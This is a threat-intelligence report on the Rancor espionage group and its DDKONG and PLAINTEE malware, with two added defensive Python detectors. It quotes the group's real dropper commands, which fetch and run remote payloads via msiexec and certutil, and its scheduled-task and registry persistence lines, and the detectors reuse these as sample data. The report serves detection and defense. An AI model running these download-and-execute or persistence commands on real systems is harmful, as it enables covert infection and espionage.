The Rancor Hacking Group

The Rancor group is involved in highly targeted attacks focused in South East Asia, specifically in Singapore and Cambodia. Rancor uses two major Windows malware families named “DDKONG” and “PLAINTEE”.[1]

Rancor, a previously unidentified group, delivers malware using three different technical methods:

  • Microsoft Excel Document with embedded malicious macros
  • HTML Application file, most likely delivered by email attachment
  • DLL Loader


Although no malicious email messages were observed, the decoy files present on infected systems suggest that delivery is achieved using email attachments. The decoy documents are often downloaded from a legitimate but compromised website and display relevant regional news to divert suspicion from the malware infection.

Details:

Both the DDKONG and PLAINTEE malware families are distributed as custom DLLs with a plugin architecture that allows attackers to expand and modify their functionality. Example payloads observed included viewing the host network configuration and listing, uploading, and downloading files on infected Windows hosts.

DDKONG creates a named event, “RunOnce”, which can be used to detect infection. It communicates with a command and control (C2) server to receive the plugins.

PLAINTEE uses a custom protocol for its C2 communications and creates a mutex named “microsoftfuckedupb” which could be used to detect infection.

Mitigation at the delivery phase can be achieved by changing or disabling the Windows default “.hta” file handler and exercising caution when opening emails with Microsoft Office document attachments that require macros enabled.

Origin and Targets:

The group has been targeting political entities in Singapore and Cambodia, especially non-technical individuals, in highly targeted campaigns. It is believed that the Chinese cyber espionage group DragonOK is behind Rancor. DragonOK has been involved in various campaigns in the past, including the KHRAT trojan.

Rancor Delivery and Loading Mechanisms

Type 1 – Delivery using document property macro:

One of Rancor’s delivery methods is to leverage a Microsoft Office Excel document with an embedded macro to launch their malware. The main malicious code is embedded in the EXIF metadata property of the document. The content of the macro itself is relatively simple (see Figure 1). Yet the small footprint of the malicious code prevents detection by automated systems that scan macro content.

Figure 1. Malicious Macro Code

The “Company” field contains the raw commands necessary to download and execute the next stage of the malware:

    cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /I http://199.247.6.253/ud^",false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs
        & schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\Windows\System32\spool\drivers\color\tmp.vbs" /mo 2 /F
        & schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\Windows\System32\spool\drivers\color\tmp.vbs" /mo 2 /RU SYSTEM
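Because the macro body is tiny, a defender gets more value from inspecting the document properties than the macro. The following Python script is an added example, not code from this report or from Unit 42: it builds a constructed minimal OOXML container (only the docProps/app.xml part is included), reads the Company property, and flags shell-like tokens; the malicious sample value is the command quoted above.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace of docProps/app.xml, the part where Office stores the Company property.
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Tokens that have no place in a company name; taken from the command quoted
# in the report (cmd /c, CreateObject, Wscript, msiexec, a URL, a dropped .vbs).
SUSPICIOUS = re.compile(
    r"cmd\s*/c|createobject|msiexec|schtasks|wscript|https?://|\.vbs", re.I)

def company_property(doc_bytes):
    """Return the Company property of an OOXML document, or None if absent."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as z:
        if "docProps/app.xml" not in z.namelist():
            return None
        root = ET.fromstring(z.read("docProps/app.xml"))
    node = root.find("{%s}Company" % APP_NS)
    return node.text if node is not None else None

def scan_document(doc_bytes):
    """Return (is_suspicious, sorted lower-cased tokens found in Company)."""
    value = company_property(doc_bytes) or ""
    hits = sorted({m.lower() for m in SUSPICIOUS.findall(value)})
    return (bool(hits), hits)

def build_workbook(company):
    """Constructed minimal OOXML container holding only the part this check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/app.xml",
                   '<Properties xmlns="%s"><Application>Microsoft Excel</Application>'
                   '<Company>%s</Company></Properties>' % (APP_NS, escape(company)))
    return buf.getvalue()

# Constructed samples: a benign workbook and one carrying the report's command.
BENIGN = build_workbook("Contoso Ltd")
MALICIOUS = build_workbook(
    'cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /I '
    'http://199.247.6.253/ud^",false,0 <nul > '
    'C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, scan_document(doc))
```

On a real workbook, pass the raw .xlsx or .xlsm bytes to scan_document; the zip layout is the same.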

Type 2 – Delivery using HTA Loader

Figure 2. Loaded Image File

The HTA Loader delivery method involves Rancor attackers sending an email with an attached HTML Application file. When opened and executed, the key components of the HTA file download and execute additional malware components from a remote URL. The malware also loads a decoy image file hosted externally (Figure 2).

Type 3 – Delivery via DLL Loader

There are three different Rancor DLL loaders.  The loaders contain a single exported function and will execute a single command.  The sample command is shown below:

    cmd /c Echo CreateObject("WScript.Shell").Run "msiexec /q /i http:\\dlj40s.jdanief[.]xyz/images/word3.doc",0 >%userProfile%\AppData\Local\Microsoft\microsoft.vbs

    schtasks /create /sc MINUTE /tn "Windows Scheduled MaintenBa" /tr "wscript %userProfile%\AppData\Local\Microsoft\microsoft.vbs" /mo 10 /F

    cmd /c certutil.exe -urlcache -split -f http:\\\\dlj40s.jdanief[.]xyz/images/1.pdf C:\ProgramData\1.pdf&start C:\ProgramData\1.pdf


The above command downloads and executes a payload and configures it for persistent execution.  In two of the three DLL Loader samples, the malware also downloads and opens a decoy PDF document, which is hosted on a legitimate but compromised website.

Payload Overview

DDKONG

The malware has three exported functions:

  • ServiceMain
  • Rundll32Call
  • DllEntryPoint

The ServiceMain exported function indicates that this DLL is expected to be loaded as a service. When this function runs, it spawns a new instance of the malware by invoking the Rundll32Call export via rundll32.exe.

The Rundll32Call exported function begins by creating a named event, ‘RunOnce’. If this is the only instance of DDKONG running at the time, the malware continues; if not, it terminates. This ensures that only a single instance of DDKONG is executed at a given time. It then decodes a configuration, sends a beacon to a C2 server via raw TCP, and downloads plugins according to the C2 response. A plugin was identified that allowed attackers to list, upload, and download files from the victim.

The DllEntryPoint exported function is the standard DLL entry point for Microsoft DLLs.

PLAINTEE

PLAINTEE uses a custom UDP protocol to communicate.  PLAINTEE contains the following exported functions:

  • Add
  • Sub
  • DllEntryPoint


The DLL expects the export named “Add” to be used when initially loaded.  When this function is executed, PLAINTEE executes the following command in a new process to add persistence:

    cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "Microsoft Audio" /t REG_SZ /d "%APPDATA%\Network Service.exe" "[path_to_PLAINTEE]",Add /f


PLAINTEE then calls the “Sub” function, which begins by creating a mutex named “microsoftfuckedupb” to ensure only a single instance is running at a given time. PLAINTEE creates a unique GUID via a call to CoCreateGuid() to use as an identifier for the victim. The malware then collects general system enumeration data about the infected machine and enters a loop in which it decodes embedded configuration data and sends an initial beacon to the C2 server. PLAINTEE communicates via a custom UDP protocol. It expects each downloaded plugin to be a DLL with an exported function named either “shell” or “file”. The commands “tasklist” and “ipconfig/all” were observed, with their output sent to the remote server.
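The command lines quoted in the Type 1 and Type 3 delivery sections and the reg add persistence step above share a few stable features: a quiet msiexec install of a package fetched from a URL, a minute-interval scheduled task that runs a dropped .vbs script, certutil used as a downloader, and the “Microsoft Audio” RunOnce value. The following Python detection is an added example, not from this report; it runs those patterns over constructed process-creation records in a simplified pid|image|command_line form.

```python
import re

# One regex per behaviour quoted in the report; the keys are the detection labels.
RULES = {
    # quiet msiexec install of a package fetched straight from a URL (Types 1 and 3)
    "msiexec_remote_quiet": re.compile(r'msiexec(?:\.exe)?\s.*?/q\s.*?/i\s+https?:', re.I),
    # minute-interval scheduled task whose action is a dropped .vbs script
    "schtasks_script_minute": re.compile(
        r'schtasks\s+/create\s.*?/sc\s+MINUTE\s.*?/tr\s+"?(?:wscript\s+)?[^"]*\.vbs', re.I),
    # certutil used as a downloader (the Type 3 decoy PDF fetch)
    "certutil_urlcache": re.compile(r'certutil(?:\.exe)?\s.*?-urlcache\s.*?-f\s+https?:', re.I),
    # PLAINTEE's RunOnce persistence value
    "runonce_microsoft_audio": re.compile(
        r'reg\s+add\s+"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"'
        r'.*?/v\s+"Microsoft Audio"', re.I),
}

def classify(command_line):
    """Return the sorted names of all rules that fire on one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))

def scan_log(records):
    """Return (pid, image, rule_names) for every record that triggers a rule.

    Records are constructed strings in the form pid|image|command_line.
    """
    hits = []
    for record in records:
        pid, image, cmd = record.split("|", 2)
        names = classify(cmd)
        if names:
            hits.append((int(pid), image, names))
    return hits

# Constructed process-creation records; the first three carry the commands quoted above,
# the last two are benign look-alikes that must not fire.
LOG = [
    '4120|C:\\Windows\\System32\\cmd.exe|cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /I http://199.247.6.253/ud^",false,0 <nul > C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs & schtasks /create /sc MINUTE /tn "Windows System" /tr "C:\\Windows\\System32\\spool\\drivers\\color\\tmp.vbs" /mo 2 /F',
    '5002|C:\\Windows\\System32\\cmd.exe|cmd /c certutil.exe -urlcache -split -f http://dlj40s.jdanief[.]xyz/images/1.pdf C:\\ProgramData\\1.pdf&start C:\\ProgramData\\1.pdf',
    '5210|C:\\Windows\\System32\\cmd.exe|cmd.exe /c reg add "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" /v "Microsoft Audio" /t REG_SZ /d "%APPDATA%\\Network Service.exe" "[path_to_PLAINTEE]",Add /f',
    '6001|C:\\Windows\\System32\\schtasks.exe|schtasks /query /tn "Windows System"',
    '6100|C:\\Windows\\System32\\cmd.exe|cmd /c certutil -hashfile C:\\ProgramData\\1.pdf SHA256',
]

if __name__ == "__main__":
    for pid, image, names in scan_log(LOG):
        print(pid, image, ", ".join(names))
```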

Conclusion

DDKONG and PLAINTEE use sophisticated methods that show how the group's techniques have evolved over time. Notably, PLAINTEE's use of a custom UDP protocol is rare and worth considering when building heuristic detections for this otherwise unknown malware. The group has a highly developed skill set that allows it to build such capabilities.

Our customers are advised to change or disable the default handler for “.hta” files on Windows hosts.  This will prevent Rancor from using the HTML Application File delivery method.

Caution is advised when opening email attachments, especially macro-enabled Microsoft Office documents.

For questions or comments regarding this report, please contact the Lab directly at 603-606-1246, or feedback@wapacklabs.com

 

[1] https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/

 
